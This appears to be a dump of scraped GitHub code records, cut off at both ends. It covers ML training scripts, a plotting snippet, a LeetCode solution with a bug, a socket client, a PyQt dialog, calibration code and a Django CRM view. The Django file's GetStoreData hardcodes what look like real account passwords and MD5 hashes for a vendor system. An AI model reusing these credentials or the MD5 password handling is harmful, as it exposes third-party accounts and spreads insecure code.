=============================================================================\n        print(f'\\n{file_number}\\t', end='')\n        for k, result in enumerate(results) :\n            print(f'{label_map[result[0]]:_<5}, {result[1]:.5f} ',end='')\n        print(f' time: {inf_time}',end='')\n    \n    # Cleanup\n    print('')\n\nif __name__ == '__main__':\n    sys.exit(main() or 0)\n","repo_name":"ippei8jp/keras_TransferLearning1","sub_path":"convert_to_openVINO/_test.py","file_name":"_test.py","file_ext":"py","file_size_in_byte":10586,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25289842437","text":"import os\nimport sys\nimport joblib as jb\nimport pandas as pd\nfrom sklearn.metrics import r2_score\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error as mse\nfrom sklearn.metrics import mean_absolute_error as mae\nfrom sklearn.gaussian_process import GaussianProcessRegressor as Gpr\nsys.path.append(os.path.abspath('../visualization'))\nimport visualize\n\ndata_type = ['robust', 'standard', 'minmax']\ndata_type_index = 2\ntest_size = 0.25\nrandom_state = 48\npath = f'../../dataset/scaled/netflix_scaled_{data_type[data_type_index]}.csv'\n\n\nclass TrainModel:\n    def __init__(self):\n        self.df_netflix = pd.read_csv(path, index_col=False)\n        self.visualize = visualize.Visualize()\n\n    @staticmethod\n    def display_dataframe(name, df, contents):\n        table = 
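# Standalone sketch of the top-k idiom used in decode_result() above: np.argsort
# sorts ascending, so the last k indices reversed give the k highest scores first.
import numpy as np

scores = np.array([0.05, 0.60, 0.10, 0.20, 0.05])  # toy classifier output
top3 = np.argsort(scores)[-3:][::-1]
print([(int(i), float(scores[i])) for i in top3])  # [(1, 0.6), (3, 0.2), (2, 0.1)]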
df.head(contents)\n        print('\n')\n        print(\"=\" * 150)\n        print(\"◘ \", name, \" Dataframe:\")\n        print(table.to_string())\n        print(\"=\" * 150)\n\n    @staticmethod\n    def debug_text(title, task):\n        print('\n')\n        print(\"=\" * 150)\n        print('◘ ', title)\n\n        try:\n            print(task)\n\n        except Exception as exc:\n            print(\"! \", exc)\n\n        finally:\n            print(\"=\" * 150)\n\n    def train_model(self):\n        df_columns = self.df_netflix.columns.values.tolist()\n        self.debug_text(\"Dataframe Columns\", df_columns)\n\n        df_x = self.df_netflix.copy()\n        df_x = df_x.drop(columns=['clv'])\n\n        df_y = self.df_netflix[['clv']]\n        self.display_dataframe(\"Features\", df_x, 10)\n        self.display_dataframe(\"Label\", df_y, 10)\n\n        train_x, test_x, train_y, test_y = train_test_split(df_x, df_y, test_size=test_size, random_state=random_state)\n        self.debug_text(\"Shape of Training set:\", train_x.shape)\n        self.debug_text(\"Shape of Testing set:\", test_x.shape)\n\n        # Grid CV Search\n        kernels = [1 * RBF(1), 2 * RBF(1), 1 * RBF(2), 2 * RBF(2)]\n        gpr_params = {'kernel': kernels}\n\n        gpr = Gpr(optimizer='fmin_l_bfgs_b', random_state=48)\n        gpr_grid = GridSearchCV(gpr, gpr_params, scoring='neg_mean_squared_error', cv=5)\n        grid_search = gpr_grid\n        grid_search.fit(train_x, train_y)\n\n        self.debug_text(\"Ideal parameters: \", grid_search.best_params_)\n        self.debug_text(\"Ideal Score: \", grid_search.best_score_)\n        ideal_param = grid_search.best_params_['kernel']\n\n        k = 1\n        rbf = 1\n        for kernel in kernels:\n            if kernel == ideal_param:\n                self.debug_text(f\"Ideal Raw parameters:\\nk={k}, rbf={rbf}\", kernel)\n\n            k += 1\n            if k > 2:\n                k = 1\n                rbf += 1\n\n                if rbf > 2:\n                    break\n\n        # GPR Model with ideal hyperparameters\n        gpr = Gpr(kernel=ideal_param, optimizer='fmin_l_bfgs_b', random_state=48)\n        gpr.fit(train_x, train_y)\n        pred_y = gpr.predict(train_x)\n\n        # Loss functions (sklearn mean_squared_error: squared=True gives MSE, squared=False gives RMSE)\n        loss_mse = mse(train_y, pred_y, squared=True)\n        loss_r_mse = mse(train_y, pred_y, squared=False)\n        loss_r2 = r2_score(train_y, pred_y)\n        loss_mae = mae(train_y, pred_y)\n\n        self.debug_text(f\"MSE (Training {data_type[data_type_index]} data):\", loss_mse)\n        self.debug_text(f\"RMSE (Training {data_type[data_type_index]} data):\", loss_r_mse)\n        self.debug_text(f\"R-Squared (Training {data_type[data_type_index]} data):\", loss_r2)\n        self.debug_text(f\"MAE (Training {data_type[data_type_index]} data):\", loss_mae)\n\n        title = f\"Residual Loss (Training {data_type[data_type_index]} data)\"\n        self.visualize.plot_residual(train_y, pred_y, title, \"Actual Values\", \"Predicted Values\")\n\n        bins = 10\n        x_label = 'Errors'\n        y_label = 'Frequency'\n        error_list = pred_y - train_y.to_numpy().ravel()\n        title = f\"Prediction error distribution (Training {data_type[data_type_index]} data)\"\n        self.visualize.plot_dist(error_list, bins, title, x_label, y_label)\n\n        # Store Model\n        try:\n            jb.dump(gpr, f'../../models/gpr_{data_type[data_type_index]}.pkl')\n\n        except Exception as exc:\n            self.debug_text(\"! Exception encountered\", exc)\n\n        else:\n            self.debug_text(\"• Model saved successfully\", '')\n\n    def data_storage(self, df, name):\n        # Save partitioned data to storage\n        try:\n            df.to_csv(f'../../dataset/test_set/netflix_{str(name)}.csv', sep=',', index=False)\n\n        except Exception as exc:\n            self.debug_text(\"! 
Exception encountered\", exc)\n\n else:\n text = \"Dataframe successfully saved\"\n self.debug_text(text, '...')\n\n\nif __name__ == \"__main__\":\n main = TrainModel()\n main.train_model()\n","repo_name":"shahriar-rahman/Netflix-Customer-Retention-using-GPR","sub_path":"src/models/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"8735638927","text":"from pylab import *\n\nX = np.linspace(-np.pi, np.pi, 256,endpoint=True)\nS = np.sin(X)\n\nplot(X,S, color='crimson', linewidth=2.0)\nplot([-4,4],[0,0], color='black')\nplot([np.pi/2,np.pi/2],[0,1], '--', color='black')\nplot([np.pi/2-.5,np.pi/2+.5],[1,1], '--', color='black')\n\nylim(-1.5,1.5)\ntext(-np.pi-.1,0.05,'$a$')\ntext(np.pi,-0.1,'$b$')\ntext(np.pi/2-.1,-0.1,'$c$')\ntext(np.pi/2+0.6,1, '$f\\'(c)=0$')\n\ngca().xaxis.set_major_locator(NullLocator()) \ngca().yaxis.set_major_locator(NullLocator()) \nshow()\n","repo_name":"juergenmeinecke/EMET1001","sub_path":"pyplots/source_files/rollestheorem.py","file_name":"rollestheorem.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34546519794","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def minCameraCover(self, root: Optional[TreeNode]) -> int:\n \n # has no obligation for it's parent, it's parent is covered by something else\n dp1, dp2, dp3 = {}, {}, {}\n def f1(root):\n \n if root in dp1:\n return dp1[root]\n \n if not root:\n return 0\n \n if not root.left and not root.right:\n return 1\n \n withCamera = 1 + f2(root.left) + f2(root.right)\n \n left, right = float('inf'), float('inf')\n \n left = f3(root.left) + f1(root.right)\n right = f1(root.left) + f3(root.right)\n \n withoutCamera = min(left, right)\n dp1[root] = min(withCamera, withoutCamera)\n return dp[root]\n \n # there is no compulsion at all to put a camera here\n def f2(root):\n \n if root in dp2:\n return dp2[root]\n \n withCamera = 1 + f2(root.left) + f2(root.right)\n withoutCamera = f1(root.left) + f1(root.right)\n \n dp2[root] = min(withCamera, withoutCamera)\n return dp2[root]\n \n # compulsory to put a camera here\n def f3(root):\n \n if root in dp3:\n return dp3[root]\n \n dp3[root] = 1 + f2(root.left) + f2(root.right)\n return dp3[root]\n \n return f1(root)\n \n ","repo_name":"therealharish/Problem-Solving","sub_path":"leetcode/968. Binary Tree Cameras.py","file_name":"968. 
Binary Tree Cameras.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41638497755","text":"from django.shortcuts import render,redirect\nimport json\nfrom django.core.paginator import Paginator\nfrom datetime import date, timedelta\nfrom ..models import Customer, CustomerReport\nfrom django.http import HttpResponse\nfrom django.db.models import Q\nfrom django.views.decorators.csrf import csrf_exempt\n\ndef index(request,pIndex=1):\n\n    # customer list\n    ob = Customer.objects\n    oblist = ob.all()\n\n    # customer store data\n    cs_store = CustomerReport.objects\n\n    # filter conditions\n    where = []\n    key = request.GET.get(\"keyword\", None)\n    if key:\n        oblist = oblist.filter(Q(cs_name__contains=key)|Q(cs_am__contains=key))\n        where.append('keyword=' + key)\n\n    # aggregated data\n    cs_store_list = []\n\n    # data expiring this month (bydq_count)\n    current_year, current_month = date.today().year, date.today().month\n\n    # data expiring next month\n    next_month = date.today().replace(day=28) + timedelta(days=4)\n    next_month = next_month.replace(day=1)\n    next_year, next_month = next_month.year, next_month.month\n    title = ['Customer ID','Customer Name','Account Manager','Active Stores','Distribution Centers','Direct Stores','Franchise Stores','External Stores','Expiring This Month','Expiring Next Month','Actions']\n\n    for i in oblist:\n        cs_count = cs_store.filter(cs_id=i.id).count()\n        ps_count = cs_store.filter(cs_id=i.id, store_type='3').count()\n        zy_count = cs_store.filter(cs_id=i.id, store_type='4').count()\n        jm_count = cs_store.filter(cs_id=i.id, store_type='5').count()\n        wx_count = cs_store.filter(cs_id=i.id, store_type='6').count()\n        bydq_count = cs_store.filter(cs_id=i.id, store_ex_time__year=current_year, store_ex_time__month=current_month).count()\n        xydq_count = cs_store.filter(cs_id=i.id, store_ex_time__year=next_year, store_ex_time__month=next_month).count()\n\n        data = {\n            'id': i.id,\n            'cs_name': i.cs_name,\n            'cs_am': i.cs_am,\n            'cs_count': cs_count,\n            'ps_count': ps_count,\n            'zy_count': zy_count,\n            'jm_count': jm_count,\n            'wx_count': wx_count,\n            'bydq_count': bydq_count,\n            'xydq_count': xydq_count\n        }\n        cs_store_list.append(data)\n\n    pIndex = int(pIndex)\n    page = Paginator(cs_store_list, 100)\n    maxpages = page.num_pages\n    if pIndex > maxpages:\n        pIndex = maxpages\n    if pIndex < 1:\n        pIndex = 1\n    cs_store_list = page.page(pIndex)  # data for the current page\n    plist = page.page_range  # list of page numbers\n\n\n\n    context = {\"title\": title, \"CustomerReport_list\": cs_store_list, 'plist': plist, 'pIndex': pIndex, 'maxpages': maxpages,}\n    return render(request,\"Customer_checks/index.html\",context)\n\n\ndef StoreDataUpdate(request,cs_id=0):\n    # cs_id == 0 refreshes store data for all customers; a non-zero id refreshes a single customer\n    if cs_id != 0:\n        try:\n            # read the customer's url and credentials from the database\n            csdb = Customer.objects.get(id=cs_id)\n            url = csdb.cs_url\n            username = csdb.cs_username\n            pwd = csdb.cs_password\n            cs_am = csdb.cs_am\n\n        except Exception as err:\n\n            print(err)\n\n        # clear the customer's store records before updating\n        rdb = CustomerReport.objects.filter(cs_id=cs_id)\n        rdb.delete()\n\n        # fetch the store data\n        r = GetStoreData(url, username, pwd)\n        for vo in r['data']:\n            rdb = CustomerReport()\n            rdb.cs_id = cs_id\n            rdb.cs_am = cs_am\n            rdb.store_id = vo['sid']\n            rdb.store_name = vo['shopname']\n            rdb.store_type = vo['stype']  # 3=distribution center, 4=direct store, 5=franchise store, 6=external customer\n            rdb.store_ex_time = vo['renewaltime']  # expiry time\n            if vo['renewaltime'] == '0000-00-00':\n                rdb.store_ex_time = '2099-12-1'\n            elif vo['renewaltime'] is None:\n                rdb.store_ex_time = '2099-12-1'\n\n            rdb.save()\n\n        data = [{\n            'success': True,\n            'msg': 'Operation succeeded!'\n        }]\n\n        return HttpResponse(data)\n    else:\n        try:\n            # fetch all customers\n            csdb = Customer.objects.all()\n            for i in csdb:\n                url = i.cs_url\n                
username = i.cs_username\n                pwd = i.cs_password\n                cs_am = i.cs_am\n                # clear the customer's store records before updating\n                rdb = CustomerReport.objects.filter(cs_id=i.id)\n                rdb.delete()\n                # fetch the store data\n                r = GetStoreData(url,username,pwd)\n                for vo in r['data']:\n                    rdb = CustomerReport()\n                    rdb.cs_id = i.id\n                    rdb.cs_am = cs_am\n                    rdb.store_id = vo['sid']\n                    rdb.store_name = vo['shopname']\n                    rdb.store_type = vo['stype']  # 3=distribution center, 4=direct store, 5=franchise store, 6=external customer\n                    rdb.store_ex_time = vo['renewaltime']  # expiry time\n                    if vo['renewaltime'] == '0000-00-00':\n                        rdb.store_ex_time = '2099-12-1'\n                    elif vo['renewaltime'] is None:\n                        rdb.store_ex_time = '2099-12-1'\n\n                    rdb.save()\n            data = [{\n                'success': True,\n                'msg': 'Operation succeeded!'\n            }]\n            return HttpResponse(data)\n        except Exception as err:\n            data = [{\n                'success': False,\n                'msg': 'Operation failed!'\n            }]\n            return HttpResponse(data)\n\n# helper that fetches store information from the remote system\ndef GetStoreData(url, username, pwd):\n\n    import requests\n    import hashlib\n\n    # set the request headers\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'\n    }\n    # login page\n    url_login = url + \"?do=check\"\n\n    #print(url_login)\n\n    # the password must be MD5-hashed\n    md5 = hashlib.md5()\n    md5.update(pwd.encode('utf-8'))\n    hide_pw = md5.hexdigest()\n\n    # a few accounts use fixed password hashes\n    if pwd == \"acewill@321\":\n        hide_pw = 'fe9bd43565f5d435da0539793d93c0e9'\n    if pwd == \"gyljcgtdcpb@acewill.cn\":\n        hide_pw = \"2142baf3b6e652c61ac34a9e29d19999\"\n\n    # assemble the request parameters: username, password, hashed password\n    data = {\n        'name': username,\n        'pwd': pwd,\n        'hide_pw': hide_pw\n    }\n\n    # request the URL and keep the post-login cookie\n    response = requests.post(url_login, headers=headers, data=data)\n    cookie = response.cookies\n    print(\"cookie after login:\", cookie.get)\n    #print(\"response after login:\",response.text)\n\n    # next request: enter a store\n    url_get_store = url + \"logistics/?do=selectstore\"\n    data = {\n        'lsid': \"2\",\n    }\n    response = requests.post(url_get_store, cookies=cookie, headers=headers, data=data)\n    print(\"cookie after entering the store:\", response.cookies.get)\n    #print(\"response after entering the store:\", response.text)\n\n    # open the store query function; needed for old versions\n    url_get_tablename = url + \"chainsales/head/shop?tablename=sys_user_func\"\n    requests.get(url_get_tablename, cookies=cookie, headers=headers, data=data)\n    print(\"cookie after entering the store:\", cookie.get)\n    #print(\"response after the store query:\", response.text)\n\n    # fetch the store list\n    url_get_storelist = url + \"chainsales/head/shop/listshop?limit=1000\"\n    response = requests.get(url_get_storelist, cookies=cookie, headers=headers, data=data)\n    #print(\"the retrieved store list:\", response.json())\n\n    return response.json()\n","repo_name":"xxnhao/scmcrm","sub_path":"scmcrm/tool/views/Customer_checks.py","file_name":"Customer_checks.py","file_ext":"py","file_size_in_byte":7711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35120592695","text":"\"\"\"\nCreate a function that takes an arbitrary number of arguments\nand returns their sum and the maximum of them.\n\"\"\"\n\n\ndef summMax(*numbers):\n    summ = 0\n    for number in numbers:\n        summ += number\n    return summ, max(numbers)\n\n\nsumm, maxNumber = summMax(4, 3, 2, 1)\n\n\ndef main():\n    print(summ, maxNumber)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"cabronas/TMS87_Maksim","sub_path":"OOP/Feb 20 - Mar - 20/func/func_06.py","file_name":"func_06.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"237695085","text":"\"\"\"\n@author Lucas\n@date 2018/12/11 21:47\nTCP connection\n\"\"\"\nimport socket\n\n# create a socket\n# parameter 1: the protocol, AF_INET or AF_INET6\n# 
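# Design note (hypothetical sketch, not from the original project): the per-customer
# counts in index() issue several COUNT queries per Customer. If CustomerReport.cs_id
# were declared as a ForeignKey (the real model may use a plain integer field), one
# annotated query could gather the same numbers:
from django.db.models import Count, Q

customers = Customer.objects.annotate(
    cs_count=Count('customerreport'),
    ps_count=Count('customerreport', filter=Q(customerreport__store_type='3')),
)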
parameter 2: SOCK_STREAM selects the stream-oriented TCP protocol\nsk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# establish the connection\n# the argument is a tuple\nsk.connect((\"www.baidu.com\", 80))\n\nsk.send(b\"GET / HTTP/1.1\\r\\nHost: www.baidu.com\\r\\nConnection: close\\r\\n\\r\\n\")\n\n# wait for and receive the data\ndata = []\nwhile True:\n    # receive 1 KB at a time\n    tempData = sk.recv(1024)\n    if tempData:\n        data.append(tempData)\n    else:\n        break\n\ndataStr = (b\"\".join(data)).decode(\"utf-8\")\n\n# close the connection\nsk.close()\n# print(dataStr)\n\nheaders, HTML = dataStr.split('\\r\\n\\r\\n', 1)\n# print(headers)\nprint(HTML)","repo_name":"Conjugasion/python_study","sub_path":"main/TCP/客户端.py","file_name":"客户端.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13469745717","text":"from PyQt4.QtGui import QDialog, QGroupBox, QFormLayout, QLineEdit, QLabel, QRadioButton, \\\n    QGridLayout, QVBoxLayout, QPushButton\nfrom chem.Reaction import Reaction\n\nclass ConditionsDialog(QDialog):\n    def __init__(self, reaction):\n        super(ConditionsDialog, self).__init__()\n        self.setGeometry (300 , 300 , 700 , 350)\n        self.setWindowTitle ('Edit Conditions')\n        if reaction is None:\n            self._reaction = Reaction()\n        else:\n            self._reaction = reaction\n        self._CanReturnReaction = False\n\n        # Sets up GUI widgets. Formula boxes will need to support super and subscript somehow\n        # Will also need validation later\n\n        # Reactants section\n        self._reactantbox = QGroupBox(\"Reactants\", self)\n        self._reactantform = QFormLayout()\n        self._reactantinfoboxes = []\n        self._productinfoboxes = []\n        self._catalystinfoboxes = []\n        for x in range(Reaction.REACTING_SPECIES_LIMIT):\n            self._reactantinfoboxes.append(QLineEdit())\n            self._reactantinfoboxes[x*2].setText(self._reaction.GetReactants()[x].GetFormula())\n            self._reactantinfoboxes.append(QLineEdit())\n            self._reactantinfoboxes[x*2+1].setText(str(self._reaction.GetReactants()[x].GetInitialMoles()))\n            self._reactantform.addRow(QLabel(str(x + 1)+\".\\tFormula:\"), self._reactantinfoboxes[x*2])\n            self._reactantform.addRow(QLabel(\"\\tInitial Moles:\"), self._reactantinfoboxes[x*2+1])\n        self._reactantbox.setLayout(self._reactantform)\n        # Products section\n        self._productbox = QGroupBox(\"Products\", self)\n        self._productform = QFormLayout()\n        for x in range(Reaction.REACTING_SPECIES_LIMIT):\n            self._productinfoboxes.append(QLineEdit())\n            self._productinfoboxes[x*2].setText(self._reaction.GetProducts()[x].GetFormula())\n            self._productinfoboxes.append(QLineEdit())\n            self._productinfoboxes[x*2+1].setText(str(self._reaction.GetProducts()[x].GetInitialMoles()))\n            self._productform.addRow(QLabel(str(x + 1)+\".\\tFormula:\"), self._productinfoboxes[x*2])\n            self._productform.addRow(QLabel(\"\\tInitial Moles:\"), self._productinfoboxes[x*2+1])\n        self._productbox.setLayout(self._productform)\n        # Catalyst section\n        self._catalystbox = QGroupBox(\"Catalyst\", self)\n        self._catalystform = QFormLayout()\n        self._catalystinfoboxes.append(QLineEdit())\n        self._catalystinfoboxes.append(QLineEdit())\n        self._catalystinfoboxes.append(QLineEdit())\n        self._catalystinfoboxes[0].setText(self._reaction.GetCatalyst().GetFormula())\n        self._catalystinfoboxes[1].setText(str(self._reaction.GetCatalyst().GetInitialMoles()))\n        self._catalystinfoboxes[2].setText(str(self._reaction.GetCatalyst().GetEaChangePerMole()))\n        self._catalystform.addRow(QLabel(\"Formula:\"), self._catalystinfoboxes[0])\n        self._catalystform.addRow(QLabel(\"Moles:\"), self._catalystinfoboxes[1])\n        self._catalystform.addRow(QLabel(\"Ea change 
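# Generic sketch of the recv() drain pattern used by the TCP client above: read
# fixed-size chunks until the peer closes the connection (recv returns b''), then
# join once instead of concatenating bytes inside the loop.
def read_all(sock, chunk_size=1024):
    chunks = []
    while True:
        chunk = sock.recv(chunk_size)
        if not chunk:
            break
        chunks.append(chunk)
    return b''.join(chunks)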
(per mole):\"), self._catalystinfoboxes[2])\n self._catalystbox.setLayout(self._catalystform)\n # Forward heat transfer\n self._heatbox = QGroupBox(\"Forward heat transfer\", self)\n self._heatform = QFormLayout()\n self._endo = QRadioButton(\"Endothermic\")\n self._exo = QRadioButton(\"Exothermic\")\n if self._reaction.GetEndothermic():\n self._endo.setChecked(True)\n else:\n self._exo.setChecked(True)\n self._heatform.addRow(self._endo)\n self._heatform.addRow(self._exo)\n self._heatbox.setLayout(self._heatform)\n # Other conditions section. Includes Vessel volume; Temperature.\n self._otherbox = QGroupBox(\"Other conditions\")\n self._otherform = QFormLayout()\n self._tempbox = QLineEdit()\n self._volbox = QLineEdit()\n self._tempbox.setText(str(self._reaction.GetTemperature()))\n self._volbox.setText(str(self._reaction.GetVolume()))\n self._otherform.addRow(QLabel(\"Vessel volume:\"), self._volbox)\n self._otherform.addRow(QLabel(\"Temperature:\"), self._tempbox)\n self._otherbox.setLayout(self._otherform)\n # OK and Cancel buttons\n self._okbtn = QPushButton(\"OK\")\n self._okbtn.clicked.connect(self.ApplyChanges)\n self._cancelbtn = QPushButton(\"Cancel\")\n\n self._rightbox = QGroupBox()\n self._rightbox.setFlat(False)\n self._rightform = QVBoxLayout()\n self._rightform.addWidget(self._catalystbox)\n self._rightform.addWidget(self._heatbox)\n self._rightform.addWidget(self._otherbox)\n self._rightbox.setLayout(self._rightform)\n\n # Layout of all those group boxes\n self._grid = QGridLayout()\n self._grid.addWidget(self._reactantbox, 0, 0)\n self._grid.addWidget(self._productbox, 0, 1)\n self._grid.addWidget(self._rightbox, 0, 2)\n self._grid.addWidget(self._okbtn, 1, 1)\n self._grid.addWidget(self._cancelbtn, 1, 2)\n self.setLayout(self._grid)\n\n if reaction is None:\n self._reaction = Reaction()\n else:\n self._reaction = reaction\n\n self._okbtn.clicked.connect(self.close)\n self._cancelbtn.clicked.connect(self.close)\n self.exec_()\n\n def ApplyChanges(self):\n errorlist = []\n # Validation goes here later\n if len(errorlist) == 0:\n for x in range(Reaction.REACTING_SPECIES_LIMIT):\n self._reaction.GetReactants()[x].SetFormula(self._reactantinfoboxes[x*2].text())\n self._reaction.GetReactants()[x].SetInitialMoles(float(str(self._reactantinfoboxes[x*2+1].text())))\n self._reaction.GetProducts()[x].SetFormula(self._productinfoboxes[x*2].text())\n self._reaction.GetProducts()[x].SetInitialMoles(float(str(self._productinfoboxes[x*2+1].text())))\n self._reaction.GetCatalyst().SetFormula(self._catalystinfoboxes[0].text())\n self._reaction.GetCatalyst().SetInitialMoles(float(str(self._catalystinfoboxes[1].text())))\n self._reaction.GetCatalyst().SetEaChangePerMole(int(str(self._catalystinfoboxes[2].text())))\n self._reaction.SetTemperature(int(self._tempbox.text()))\n self._reaction.SetVolume(float(self._volbox.text()))\n\n def GetReaction(self):\n if self._CanReturnReaction:\n return self._reaction\n\n def close(self):\n self._CanReturnReaction = True\n super(ConditionsDialog, self).close()","repo_name":"fredtargaryen/eqmsim2015","sub_path":"Equilibrium Simulator 2015/PROTOTYPE/gui/ConditionsDialog.py","file_name":"ConditionsDialog.py","file_ext":"py","file_size_in_byte":6572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3337621308","text":"import logging\nimport os\nimport sys\nimport random\nimport pandas as pd\nfrom utils import calibrate, get_detectors\n\nlogging.basicConfig(level=logging.INFO, filename='calib.log', 
filemode='w')\nLOGGER = logging.getLogger(__name__)\nLOGGER.addHandler(logging.StreamHandler()) \n\n# Folder where calibraiton data is\ndata_dir = sys.argv[1]\n\ncharuco_rig = {\"dir\": \"charuco_rig\", \"pattern\": \"charuco\"}\ndots_rig = {\"dir\": \"dots_rig\", \"pattern\": \"dots\"}\ncharuco_freehand = {\"dir\": \"charuco_freehand\", \"pattern\": \"charuco\"}\ndots_freehand = {\"dir\": \"dots_freehand\", \"pattern\": \"dots\"}\n\n#TODO: Get rid of iterative option?\nis_iterative = False\nfor dataset in [dots_freehand, charuco_freehand, charuco_rig, dots_rig]:\n\n directory = os.path.join(data_dir, dataset[\"dir\"])\n\n if not os.path.exists(directory):\n LOGGER.info(\"Directory doesn't exist: %s, skipping\", directory)\n continue\n\n pattern = dataset[\"pattern\"]\n \n LOGGER.info(f'Processing dataset: {dataset}')\n\n calibrations = os.listdir(directory)\n \n # Loop over every set of collected images and use each for precalibration,\n # then calibrate on the rest. This takes a long time!\n\n\n left_point_detector, right_point_detector, iterative_image_file = \\\n get_detectors(pattern, is_iterative)\n\n for i, calib_set in enumerate(calibrations):\n stereo_reproj_errors = []\n stereo_recon_errors = []\n tracked_reproj_errors = []\n tracked_recon_errors = []\n calib_times = []\n frame_grab_times = []\n successful_dirs = []\n\n # Split into precalib set and the rest\n precalibration_data = calibrations[i]\n test_data = (c for j, c in enumerate(calibrations) if j != i)\n\n LOGGER.info(f\"Using {precalibration_data} for precalibration\")\n\n full_path = os.path.join(directory, precalibration_data)\n\n stereo_reproj_err, stereo_recon_err, tracked_reproj_err, \\\n tracked_recon_err, elapsed_time, mean_frame_grabbing_time, \\\n stereo_params = calibrate(left_point_detector,\n right_point_detector,\n full_path)\n\n LOGGER.info(f\"Stereo Reprojection Error: {stereo_reproj_err}\")\n LOGGER.info(f\"Stereo Reconstruction Error: {stereo_recon_err}\")\n LOGGER.info(f\"Tracked Reprojection Error: {tracked_reproj_err}\")\n LOGGER.info(f\"Tracked Reconstruction Error: {tracked_recon_err}\")\n LOGGER.info(f\"Calibration took: {elapsed_time} seconds\")\n\n for calibration in test_data:\n LOGGER.info(f\"Calibrating {calibration}\")\n\n try:\n full_path = os.path.join(directory, calibration)\n \n stereo_reproj_err, stereo_recon_err, tracked_reproj_err, \\\n tracked_recon_err, elapsed_time, mean_frame_grabbing_time, \\\n stereo_params = calibrate(left_point_detector,\n right_point_detector,\n full_path,\n stereo_params)\n\n LOGGER.info(f\"Stereo Reprojection Error: {stereo_reproj_err}\")\n LOGGER.info(f\"Stereo Reconstruction Error: {stereo_recon_err}\")\n LOGGER.info(f\"Tracked Reprojection Error: {tracked_reproj_err}\")\n LOGGER.info(f\"Tracked Reconstruction Error: {tracked_recon_err}\")\n LOGGER.info(f\"Calibration took: {elapsed_time} seconds\")\n\n stereo_reproj_errors.append(stereo_reproj_err)\n stereo_recon_errors.append(stereo_recon_err)\n tracked_reproj_errors.append(tracked_reproj_err)\n tracked_recon_errors.append(tracked_recon_err)\n calib_times.append(elapsed_time)\n frame_grab_times.append(mean_frame_grabbing_time)\n\n successful_dirs.append(calibration)\n\n except Exception as ex:\n LOGGER.error(f\"Error processing {full_path}\")\n LOGGER.error(ex)\n\n labels = [\"Reproj.\", \"Recon.\", \"Tracked Reproj.\", \"Tracked Recon.\", \\\n \"Mean Frame Grab Time\", \"Mean Calibration Time\"]\n\n df = pd.DataFrame([stereo_reproj_errors,\n stereo_recon_errors,\n tracked_reproj_errors,\n 
tracked_recon_errors,\n frame_grab_times,\n calib_times\n ],\n index=labels,\n columns=successful_dirs).transpose()\n\n output_dir = f'results/precalib/{dataset[\"dir\"]}'\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n filename = f'{ dataset[\"dir\"]}-precalib-{calibrations[i]}.csv'\n\n if is_iterative:\n filename = f'{ dataset[\"dir\"]}-precalib-{calibrations[i]}-iterative.csv'\n\n output_path = os.path.join(output_dir, filename)\n df.to_csv(output_path)\n\n LOGGER.info(df)\n\n","repo_name":"UCL/WEISS_Calibration_Study","sub_path":"precalibration.py","file_name":"precalibration.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4050388012","text":"from .db import db, environment, SCHEMA, add_prefix_for_prod\nfrom datetime import datetime\n\n\nclass Post(db.Model):\n __tablename__ = \"posts\"\n\n if environment == \"production\":\n __table_args__ = {'schema': SCHEMA}\n\n id = db.Column(db.Integer, primary_key=True)\n wall_id = db.Column(db.Integer, db.ForeignKey(\n add_prefix_for_prod(\"users.id\")), nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey(\n add_prefix_for_prod(\"users.id\")), nullable=False)\n content = db.Column(db.Text, nullable=False)\n image = db.Column(db.String)\n created_at = db.Column(db.DateTime, nullable=False, default=datetime.now())\n\n\n #Relationships\n user_destination = db.relationship(\"User\", back_populates=\"posts_destination\", foreign_keys=[wall_id])\n user_author = db.relationship(\"User\", back_populates=\"posts_author\", foreign_keys=[user_id])\n comments = db.relationship(\"Comment\", back_populates=\"post\", cascade=\"all, delete\")\n likes = db.relationship(\"Like\", back_populates=\"post\", cascade=\"all, delete\")\n\n\n def to_dict(self):\n return {\n \"id\": self.id,\n \"wallId\": self.wall_id,\n \"userId\": self.user_id,\n \"content\": self.content,\n \"image\": self.image,\n \"createdAt\": self.created_at,\n \"User\": self.user_author.to_dict()\n }\n\n def to_dict_with_comments(self):\n test = [ele.to_dict_with_user() for ele in self.comments]\n return {\n \"id\": self.id,\n \"wallId\": self.wall_id,\n \"userId\": self.user_id,\n \"content\": self.content,\n \"image\": self.image,\n \"createdAt\": self.created_at,\n \"User\": self.user_author.to_dict(),\n \"Comments\": test,\n \"Comments_Count\": len(test),\n }\n\n def to_dict_with_comments_likes(self):\n test = [ele.to_dict_with_user() for ele in self.comments]\n return {\n \"id\": self.id,\n \"wallId\": self.wall_id,\n \"userId\": self.user_id,\n \"content\": 